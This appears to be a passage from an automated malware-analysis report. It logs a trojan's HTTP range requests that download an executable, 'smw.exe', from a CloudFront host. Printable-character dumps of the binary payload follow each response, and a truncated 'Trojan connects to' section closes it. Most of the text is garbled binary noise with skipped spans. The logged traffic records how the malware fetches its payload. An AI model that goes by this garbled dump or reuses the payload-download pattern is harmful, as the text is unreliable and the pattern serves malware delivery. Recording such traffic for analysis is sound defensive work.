    Age: 69502
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: C_qZtxpdK-EQ-QJMJS4GOCUzKD4VH35JBgcjNOWw82Qh5hYwnYIhew==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
    ...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
    .PE..L.....GO.................t...z...B...8............@..............
    ............ ......U.O...@.................................@..........
    ..............%O......`...............................................
    ........................................text....r.......t.............
    ..... ..`.rdata..n .......,...x..............@[email protected].... ...........
    [email protected]......
    .........................@[email protected][email protected].
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ...............................................U....\.}..t .}.F.E.u..H
    [email protected][email protected]...
    ..@..}[email protected]... M..........M........E...FQ.....NU
    ..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
    [email protected]}[email protected].}.j.W.E......E.....
    [email protected][email protected][email protected] [email protected].
    u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
    S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 500000-749999/5194096
    Age: 69505
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 6wJHE_VBRiv20F8ZEUcEo11WkIkEukjUalScm-Mf0fNjfutAoTzbIA==
    g.}m..]b.W.....!_..]..u.<.......r..$............B/....y....=.hK...j
    ...3~|.x.).0y..<..3wjC..#`.>...8.Q...hd...l8S.]C...H...m.Q?0.M..
    [email protected]..[......*...X...e.E<[.....AT....Xa.R......9.^.....r..iJmy.7.
    ..=...wP...; ....m.Z]b.\..vO|T.~.P.-.U..^?..xQ!...... ..'.............
    x...........|..,...?.*f..p./...J<............NO....=...z....I..`.7
    .a.Mxi^...0.Y.=..J..`./."c........G.w^......1../.....Pz.Ya.) ..)Z.wJ.J
    ..#*A.u...\. T.4_. 3I.......P.......B.....D....[.Xi....l..b...3i.F.wA.
    .%..p.3.{...0.....EH....,...Q..M%..'...?n#...7nb#..x.nb|-./.W&q.....zH
    k=..Z.#.!F.Z.......5U.&.X...{S....YU.3cs.`.9.$Ck='...z..;d........C..
    ."A..dS.([.....'.... .K...E..x......5-.T..<.e\A........}....`L....?
    .".!.X...2.........6..z..[Z.......o ...|v..e..[...../..*.ni.*cAS2...d.
    f.}..RQ....Ut .........A.^@.3.X.V.........t;......K.....B........I...4
    ...u.,W|.D.o..q..m5q............m..(..8...y$..../)..).....;..3y..n...~
    9.Q?..u.B.P.....$..1...L,..].....O"....N.....g.T...K.`.8.....CL....9w.
    .<..;...".!z3r.Q..ht....;d......1....'...j4..T/.......".@?........I
    ....o..}.Km.I..s.Z...\....u.c........F.F.s.i...9.P.(.......gJj..$..92.
    ... .....b.{...JU...4..W.j.....`[email protected].........'..~....\G4...i.
    j..G..h.U....RX*.....YZ........h../9.N|.....$.....C2....X.....3...di..
    .......TFy.D..2}6.s]..;ajv)q. ja..K......}..HE5.Q.q\.."............k..
    ...}s.~.A:..U.8..}...1..u.{k[...k....&:."M..........ID....h6i....g..M.
    Nv- ...C.q..R.. 91...u........i.Z.. .=Y:.X...a4...............B.K..0K.
    .A..9D...A.S...D. .B..,..,U...,A......kR"..Go.: I.$....pu....u.-.

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 1000000-1249999/5194096
    Age: 69508
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: aLHsSND6T5FNtxEIKpKWClvpqdTt-trK04VhOQW6yw5TGgkRKb1C0Q==
    ...N..h.C1T.hl..gwVW..j.)u(..q.i.a..=..'.E....z [.`A..%..`..{>7....
    oW.S.S.._.]j.u..CP..e?....fsk...L..=xE-$.=G{..{t8...!T...JH....T......
    . ;.<............j.r...... .R0..3.,.{...H.k!.<[email protected]
    ..[..p..`..v.R'.....!.2|...n.O."'g.fPd.....jY..}.$.M.pN.s...vd.....^..
    .......FvS.D)......Q...#....$..d......k...............n GtQ..i.5h..7..
    .|-h.<..9....2..n.QJ....;.n.!........\-{..pv.'O#[email protected],.7
    .5WI%..t?.....3..&'..`.L.Kk?...:=5}......=..:..A..3.b?}........Q.D....
    ...^.8t...........H.a......\....".q.o......n...y..D...J...CjO..h.2#...
    A.E...u..M~..j...M\2...X..../...Ji.24x...,.-?...sc.\.N.B....7...?4.1.2
    .5..~.p..v..*.[.Qxl.^[..q.3.!.q.w.l....'..\..|.R..G .*..)./.Lz.....[.8
    k....a....k..'........f..Z....\.Ad`M.:..\ W!....m.H....M.kY.4..r.-5.k.
    r.....O.2............P.]u&M ..B....<.....`....'..V0.KmL.....s.ec...
    .RDc..*X;..2B.}O..:..e.8..!..........r......{%l.....t.}I...`N!4.m.?=..
    .....kC..Q.[G.Z.V......PX.....6$..s....Z.~b.S..w.3....l..v....;.g...p.
    ,..' .3h0D.".x#.....5..(.Z...f.aR.C.....Q=......L...Bs>.....3n...{^
    ......A....E...s-.q:.....n(.....a.H......{.].....7.. ...J.w....|.iA.r.
    7`...s....2rv..p...L...0.2....4....H.O8.|[....!g...)......4..Z..;...r&
    lt;..)...U.....S.^[email protected]'zJ.V....7......
    ...l..l.....F:......{..}...y.a..Jr..-...3_.o.wF..`.....E...~}.l....6.A
    ....dn..P$xa.MMi.h4..y........#=..G.....ET~....j.g.TJ.?..`...=....].n.
    ..z..R .A...f...v#s.j...f.........NPZJ..m.u.......`g.U.....4.[CjI.....
    ...>....7!NA.R5........x..Ky.;..\7.n...m2#.....#=;.:.i,.. ....C

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 1500000-1749999/5194096
    Age: 69511
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: jm-za-tYEhCy3faAr3zE97weS9HOAlb0v07W0U3PYh4pSiK6Hf48_A==
    [email protected]{.?...pc....0......y...h.I. *....<....
    . .... .....o.....C}Sd..B.i*..O...E...Y.`[email protected]/A......X...,Y,JX.#.
    .......u...{....f.8.;.%..F...AJ.e[[email protected].._...i....<..7...G^...E...
    ....B...;.Z...~.r.. ...l...{<y..b.........[.......`.N.>(..<p.
    k.........R.q.k.a 8U.a*dV.!F.?H..$..<.9..~.n.|v....L...D.zx...=h...
    .....:...:C...".......p..C.dX . X2X..1.k..g......Z<.ZO4k..v}.nT)..]
    ......sv..z........)..Ek.i..lb8.....]..0q2..3.7....}.._(....V]p..0..s.
    R......i....U!. ...y4@34...:I..O.f.G..Bj.u...9...n..xd.Ce.......T...9S
    .L;...2.Y4}.....7pk^h.J...p..(Y.w...,....=..J.....P.]..zZ.#.e....w...;
    .R].D_.'B<.....x......;k...........>&..G..C....y...S.(....=.....
    V.`&%...n..c.U0Y.k....Y.C.g....[.V....@. .0,v..=.....(.N........Y..e..
    .r]1...=.....Y......./dOAG....\[s......h.o..#..w.....^..?.......U...U.
    l...{.:..g..^B.@...~...4. {.|..A...=.../.....Q/....Z..V..f..j.&...:.Ds
    ...0......9... 6.,g..!.<....L..,AQ.\h.&.......7`&..U...6M.........
    t...e..s`.q7...3..^.wM...O.u.g.....;./....*p>u..._M..a?J.......f.I.
    BOb..O@..)......^...V2.......><.....S........Vg.........8*...G:.
    ....x [...{......5..C^...%..h.V\..6[c......M.hI.....q..1n=........[F..
    %no...q<.........O...S.../.ye8..qXL.....>:D.."._v.{. ....Tv.....
    ..;'.C......n..y./..t....f.A./<.WP`..)0./...CH`7.7L.X.&..`Vb'..`..;
    ..^h....b.J4...;......#.9..].c.x...\7\.d..!4...(.@.. ..d.^#.Y..oH...oy
    ....k..{...]..d.^.........`4e...,[email protected]. (1kzev.........
    e?..K.t...".....:............,..(.U..E{..T.am.....s.O..=..).kPq...

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 1750000-1999999/5194096
    Age: 69515
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: tjNd4BGhIVkTWKraQ-dnfLf5olH0w5jfLtcPi5UHQbLbcqvn2x4jqw==
    (......../[email protected]
    ..g....AG.0.....3...b.>..A...0`.j.uz...X@Y.*1.a`...|..,..O`.8&H.7z.
    .... m..5.&m.6..Qi.C.cD.../P..........:..B. . ..v.......h...R..K..qm/.
    '..4^...;O....w.W..G.T....Wl. .....6..X M..(N. .h..2....r../`.....d.?@
    .. ...9......-.e..2.>..c6..........e...m..4..k}..P^K:..j.........{.
    ..5.AX&.R.%..xt......=....... .w..5...8..O....mw.q...S...L.@.;...7....
    .^[email protected]..:.P....... .8.`..}PX....bNJ..N.R~.....7yL.w|..T.?..a~.
    ..L...D.RCc..c0..L,..):.[u...\....X,6...N..G..4......I....R.....R~.9s7
    .8..(Z......m..X.J]...ck..x.8.'... ....c.....|......V.*....D.....k3;^.
    ....Y..dH.[.=.f..<...~.MA...k....P..h6?JpM3.....G..~.}6..1...Q...?B
    .4...(@...h.f......2.a.I.....I..d<h....<...9f.N.!(.$3*...CN.k..`
    .J..=..g...1.K...x...0..n..`.9:...m...[`.`.5:=..h.j}.^WD..DA.oNB....%.
    ../p.. ..|.v7P....Q.3N..2..&.F.....s.V,..;.C.fa.....L.../.d.....7C...l
    ..j.|U......(..8...O.....!....U..E.#....Ko O.p..5 .._.~. i_M..'b..oNs
    .....=.3.X.| .`.!.GF.......o4An.4.....a.f.J.4.~....at.......7.=._.^..P
    R...Q.9Lt.._.w.......>...."[email protected].<.<...N......2...
    ...D.. t...9l .:....ZA.....?..:Y~?...G1....Q.a}<s...],X.....[...>
    ;....d.mx...{...r.n.$.ml.(..R1.-O._..%....D......R..*..'..<y.O.....
    xF.!d.....{I..t.!?Q..2..T.5...;.|..|.....Q..PM..j..-.JCu.I..n.......).
    .'uH....dSZ..04....\o...{.V..pP..j.....g.<!e.1.....C..\..../...o...
    .\.)..>.%..k.=:..a./.T..........Q.#.kJ.....\.q...Vp.{..........a...
    .l....6.....*...h^Q."[email protected]

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=2250000-2499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 2250000-2499999/5194096
    Age: 69518
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: uDcCWQg4pKo3nA06uyAFwq1JOpQFV2JJVKexhPSReZ0XEYr4FVNeaA==
    `..h......8]vW.8.X.............A.I.......|.nK.Y...9..V.Z.......j.V...:
    .H...\.....p....NkAONMZ...v..=*...........G.......\.s.5W~.$q..Z.......
    ..YNk..u..D....(....2|.....U.e.6.m.._.....p.......9... E4.cJ.'. n ..&.
    .H.h..^N..%......<.87..X...o......"_.r....H..u...g........P?J......
    [email protected].}6.1...XN..yc.....n.s.y.1...ey......"0...|K..RK.Q
    ..kP ..[...rj.1.!b...J/j..[......41..tS..(.W;...Oj...[..T......i@{.,p.
    ..._wA..-.x.......o....^v.V...C.g\*d...x......?z...4_<.J........R1.
    h.yI.D..v2.f.....Z...-\.......'.mb....nx....x^Te.w=...3..~..`..i.G.
    5f`..T$.oQ..d.$.v5..N\...an..L..(?.......I.......WTnK$.E.........k...2
    Y^y.4...R.Q].C.......2..2h.]...j...v..W.O.jO...).B..w#....{...!..'....
    ..cke......W.J.. .../~..X..y..Rd...&....x .v9h..4.........0.9e....S.;.
    .....$_$=..~..O);.......$.(?....L.._c".........x.l..'^....t...p.....Z.
    ....i.vct.u....8...d..<.L...<<...~.|..'.....|.}...-.).......
    .Y.Z.;.......&.F...Q...jP......o.`c,[.......A.........._=aO.R.|...ly..
    ..OE...rclU9.i..'Z.Z....-..CLe@..$R$%.c:G...8...2G..Uv0#.R.. .q...W...
    ..d.*m.....'.....5).V.n..%.h:.....#....u.....G7!.x.L.ps..,...@../.3..$
    .. ....{.7.....,.rq..,?.....2Bk;......_.../^........].O.....9.....^:.R
    ......pH..k..=.=..*...pa.5}.b.....v1..CP...I........,A...8.....x.E...G
    ....".c..6o..*DM..:ys.MY:[email protected](..[.....b.s?p. .u4./...U_.w.....dP
    .8_....;>.Q..`z1.s5.,.......9p........>l....pL..t....Ya........I
    ..[3.:.|.6....i;..e.pO...l`%.Z........t.u.....K.b]..X.._..'..{...n..g.
    ..O.:.)...O..5zG.eYu......wg.... ^.9..aM.... .,..S.uI...1.....L%..

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=2750000-2999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 2750000-2999999/5194096
    Age: 69523
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: tnNVkT5vH0OVR0TqiU7TprxAMZ-wfNG1mQCiXzwnGOfCbxiR2kuQ2w==
    ...X....bV...8.(.....h..~.6.F....c...b. V..a...`....2...$2..P..r../8..
    o..a.n.,..%`...vN...7H.Wv...d.Ny./.4...z..,s ...$q....M..S...C }..M.x!
    .q|.u.ps(#*E.*....}...b. ...V.8uY .......},..0,G.....99...'<Rd9v[b.
    q.`......V.:....5.......E.ZX.-".o.....".....,.E%.h.iP.l..|........P...
    @..z[E..p.........D....._.R..../H.._...;.#..!8..J.......x..7..RY..Kn(.
    .....I..<.._3....7...I.?...*...u&..>ce..|[email protected]%.....QY
    ....=a....O...O..I8=.......R...d.m.....[..AceB..........2..G..c4.Z....
    ..Nk.(.~.2....hVV.4............?=.!.u......`... ......&$.. %t...6...]H
    ... D................{[email protected].......,....p.....s..=8. ..............
    [email protected]../[email protected]@..?)[email protected]@..}..@kJ.{....0D....
    .Y......f8...uG.s&.rh.......L.......x...d..j<..M.dl..7.N....S.....V
    KZ2Hi..J4,...S8....8..t7j:]....D....d..Sh"....X..g...;.x.......D..@bW.
    .L.LD..o%..$P.A\.1_#=....t%.eV..w...0.!?..{.b .......[..-......`..%...
    ...%..U.....6.:\.p.2...R..`..m....tS9[nZ..T.Vd.8.....Z1f..&.B..Y|....
    ..zS.......O.N.<....&S1XG..(2Q...........S..8..I_.S...Vs..o.n..j. '
    [email protected]...;TH&^.rCG........Y....wdp..".........BF;Y..E..MP.ca
    VvI..3...!2#..&T....22...zV .'.N.^.n....%J...dw (/.X..WT...^...LAS....
    ........O................Z...w...~].........@..]]...?.....#....G.KTi..
    ..r"..a..o..2x.g.?.4....U*..l.d,..g.J.... ,.}D.".......i;.GmY...=oZi}.
    L&w{.\.....$..&.?.......9.....,7.Y....d......,..4v@..:..o...z...t..4..
    y...C..n..(X..c..3.......O.[}...,>h.....X.`.E.....h.a...C.....[.}Q
    ..5..V4..%.....UaI..bFg.G....@...:s.E....y....f......a.f.gN.l..\..

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=3500000-3749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 3500000-3749999/5194096
    Age: 69527
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Tes9HFnETsgIr9YNvaK39gSSUzonE29-WP8CvaO_4XXZEePONZqWmA==
    .;o..S2..../.yZ.D...KD;.B..%..O..../R.......K.y.DW...._...q......b.RAg
    .R........UK.y1.|............g.......,.u...u..Z.z..m*..-y...5|.[......
    @..#D.......a..TG...H..*.{....._N!;..[.H.u`...)...Rh~...)..Dg.......b.
    S.....e<a....Q..&>....I...H.r:..]W...).9........(..F. 6.^..n....
    Z........CE.s3.?.}?.........6..1[..c.(..l............#....#=b3.Gz.f...
    .m......T.?.......v......@.......<........~8O./..y..g.......i......
    .v.<........4.5r.......{k.ZHqk......=....{B{[#..no.....U....B.>#
    l..?..5r...Ve..X.XS>.:...T.......J.?Ru..R...#=.N...........Y..["...
    .(k..m.{..(6...W...T.MK..c.Z....H.r|.bS.l.6....r...]K.4.i../N..`W....4
    ._(K...=.{Z...Dy_p{R...{..i.=..&.gG.nOS..>.X.10...&.Q..i.1.o..c.T.g
    .9u.4...|.4.}...G.s..F.s...|.;.7{...3Tm.. t......oR......~.Ao.=Z$..:yJ
    ..9.t.c..ku../E..Wv(:6....tDYCM.>v.n>WG....t._...?......E.?L....
    ...}.e....'..tm...t... ]....N.8.....;.t..z;..5..s...xr..d.%C...C...I..
    ..,./d(k.s|..S[2....."r...S..k}B.7...eg.\v&..f*..1..Oi{3.Y.....4.2#.d.
    |..dJx.&..V.O.....E.j.Q..2.1.-~..j..w..|.U.Eg..D...........7f.}..*\...
    o."..[.U..w..h..e.B|<.....5....i.]....-.........=X.......>:.....
    .!r.xr.R.wm..I.D.7E|m.................l.{...........#..t..u.O..8.....D
    .?..?B...Q....SvA....e#...v.h.][..vQ......n.....6..Kn...E.k..:`....B._
    ...4r....C.kF..~..D.k].R.:L|.CQ...j.r........]9..O....-_.........zw.X.
    y0G;~...4..R.s=.R...C..cQ..#~.... G............~....4...]..S..Z..~....
    ..(.[F.[...,....Q.`.V........R.}....B.x..~.'...{zY......./.....Ak.N...
    .u.z..Q...k...\..hy$.\F.c.........Q.U..]O....{..Hz.......?{&w'.e.#

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=4000000-4249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 4000000-4249999/5194096
    Age: 69531
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: wNk7GMIhmUdtbFT30tl8D6PeM9yrgd4qBYZjjGCDpaKRxiYWOjn0pQ==
    .....G...j......*.~..W|<..}....U. ..~........>..d^........a...[.
    .GT.0..W.GY..'N.MTq{G...3e....'....Q....L.=;^....cT\.zD.X.C...........
    [email protected]..._..-...k.. fhqf.6.d...F...Qs..4$.6.......c
    ........E....'w .=.0.[.D.(H..v........v....rC......)3......<5...<
    ;.....6...HX.N..o..D.t..Vb..my.m..63.ZS..a..q7C.9.........q.T=(.......
    .n.u.?'b.."v.DlY6...H..CIr..r..bb.r.1...4....z0.v,...)V......A{RrI.m..
    ....#...$...l.Ip...i.t..m....h.pb..^.a*....C..:..w%....K.......:...V.@
    ...^.i...5$.I~..]a..&....!.o.N.T./..6..|[email protected].
    .........8..........u.L.3..n...!..d1vI#8Iw..H..O.....0.m....l.D s..s.J
    ...JL8.B....7...?.........I$.NR............\Lz.W;h..v.r....0....P...|f
    ....3br......~k.c3. ...ES.8.\ I\p.pa......I.&.u.c.Y.. ..i,.gAt.-.I..l.
    l.B....PA..".Zo...U.^.,....l..Fm$TH.....Rs.......U..4...33Ld.(@..B.'.)
    A.....~#....X.$...;..^....;.OL-....w%.EC~K.c2.>O.;.e.D..$2$g...7.3m
    ...O.Z...w=.=.l:e..4......k..L....?....g.?x..H.....v./[email protected]
    b5..H.q.f......"..0].....j.9D.T...l].w..lBsU...jG.?7.=.......'..N.....
    .y .Co..{e5v ...?ETc.t...`..sD..&.?.V....&..E.....&..b...I,=.....V.j!R
    .......LVS.ri....z...V...>..c...H.".<......_.V...i....![....Pfq.
    l4R.~...aG........f........A:2 bAF~..d...,(...A....]..%[....Y....{.R=_
    ..3.."..A.....l7..Jq....?.b....M_.k........e.}../...?..../.....;..d_..
    ....2...a...8".....(H.5v.W..us........e.Z.K...(...*......58.......3...
    ..`....|.%SP]3hl....K.v..c,..0........KTdp..L.....I.Pq...].|..0.C2Xh..
    G.A.M..i*...a..Zy..b.5.3.^5x8..E..(.}......BIiytQ..H.J) F...../-..

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=4500000-4749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 4500000-4749999/5194096
    Age: 69533
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: xAw8OJyu9QY4G3ho5JDvdfUC3DuCJeCQ00iBecynhcHrJoy9S46P4A==
    -..*.m..@....;$|...0.................P.o....ce~..Ne.b....Z.Z.2c...T...
    J.F.f..9.........1...@#[email protected]....{...T....l...c....=.P
    ...*..4..>...'n.<...w...".....*...=#.&.....=.4..R.0[.g.9~.l.2...
    h.7-.:.....,..X..y.........A_.. .N.U.&d........C.o.0..0pEps...G.@..`/.
    K.c..;........j..l[......_}(c.p.y..d.....-T.@.../[email protected].
    .21I..;7...r.............t.....g.m...D7.ni..D.s..EF8.<1.).ew.....l.
    q3s......=...n.._...m.5_*A7G..&._..}P..%[email protected]
    [email protected]*bN...(].s$i.oI......Fy
    D...........>.f...m..A&...e..]ft......Xi...'...o5.....[.9...x~`..8H
    ..w;[rS. [email protected].>.......L.C....>...[..{.S$.-.".N...k....|...
    O..hkc.(..L....0.i....j..e../...gT.3..r.1.y&2.._R.....\....(,..d..s...
    ..?......B..([email protected]~....x...M.B.EH4.m..k..l.'........D..w...4...Q.C/..
    ...y.j<.....-'...>..}(3.'.......)....N.2...|...T..'j"_...Z....jA
    ..y/a..R...p..O........RT......K}.$.2.....He. .U....%...\...tw.2.4....
    ........z.D^..*s!.Dq...3,'..........l..c.t...ZJ......*...a..z..&..).:&
    gt;.u...=..;. \..j.......).......fU.3{p.....I..I.g.f$rxD.h.=..n.4...2n
    ....#k.".....m!.}....;G..5i...KvCr.LN.. ..$....S.!....9....'.1{..B...O
    .m...... z...]..... ....L`....In.[...O4b.j.~.E.9...~....1iu;g....(...
    -...k."q:.1?n=DN.%<..B)kb.....a.6.uc..8dc1....\..."...P...4....YS..
    .!.....zp..0%.G.... .2.....:.....W.l......zW.l...?.Av.x..6...S..!....
    ....s..g.y..U.&....]J.}'........!d.....Z.....c...yXLQ2P`.m.R..6...;...
    A...k.y.../.........)......:...DO.as.i...Yc.4...i... ....]....?.}.

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=5000000-5194095
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 194096
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 5000000-5194095/5194096
    Age: 69535
    X-Cache: Hit from cloudfront
    Via: 1.1 6389c842d514edc6fca1d3389e2b0189.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: aMkKmm6f6bv6zooT6uj8dy2NHb_ElLZoiXjfmz5o2lcnEwGPVGWeAw==
    .J..9.......j..JK5.z...d.[...B).`x.Q.........g~{.H...SV`.\T.z..`..v..G
    .....7.#...C...^oA.7FH..LJl..NJx6..nex.n.....~.......`MX.>.....E.$@
    .EpR.............'.q......p..4.......$.....'{..*M...bY...T........5..S
    .[..h.DS..F.z.y.... 6.SGJ.>.U.4.....U|...A.$....G4....(6.v.;dm....y
    (.:/gp m..%b..A.E...#*..'..g...NfX........9...1......D..j...K.....'..w
    0....~.....1D...u[$...m.T...`..Z.EFBa..%. ....X.j.X.9..<.`...=..Kk.
    mN........w...ZD.G....J.....W%....$z....N,t.J..P.58-...t.......s..J.n.
    ...ahp......1.....c..1!x.:..:..L....P............8y....<j......5x.}
    ..O.D>..cB.......X.RO.G.Gq.z..H_..)C...`..)..Ce.C.../Y.[..P......6.
    X....}$.m/L. .,Ab....R....7^e7.......f.#.1.u...f/.....gq.d...>.8..V
    ... .O4.... .....J..MO......bI.d*.T.8.."d...3.?...L...#.@........ .2..
    ..%b.Y}Z.5...%.S.. [email protected]..:...P...x..............
    NO4..f..........(...Y. .u.d.j.;A$...`w......m...4....xt.....t....3..{.
    ...O.&Y..R.b. .Vl'y.x...p....0.S6.-...w'..2.<O.|{.x..>.].R:M.. ~
    ~&.$.r.k>a..'.....;M..9.?..k......^....I...w...:......q...2'....:..
    ....F..}.N*[email protected].?D..... ..n..S..S..
    ...T_FK...H...}.....k...\....RQ.p..].. pgL........3U..&.m...rQm.....H.
    .."J#C.J#1..._.......r..,...w^...N.]t9..K]....&.3.)....Q..v..]......Q.
    ....x...!........t.. ..~JG. .P..B..u...S&.. .z.a.r....lf:......y3..".S
    '....NT.D.BY{^mG..(;gv.C..tz...0.M...(.6f.....L...1..$..a...._:..&..].
    *.......=._..B*...7....U.....<.z.N..C..9.(........f...c.4.F....z.i.
    :...."..b.X ./..}..'[email protected]. ..C..M...A...4..t%..%n.DU..?..4.9(h

    <<< skipped >>>

    The Trojan connects to the servers at the folowing location(s):

    smu.exe_3548:

    .text
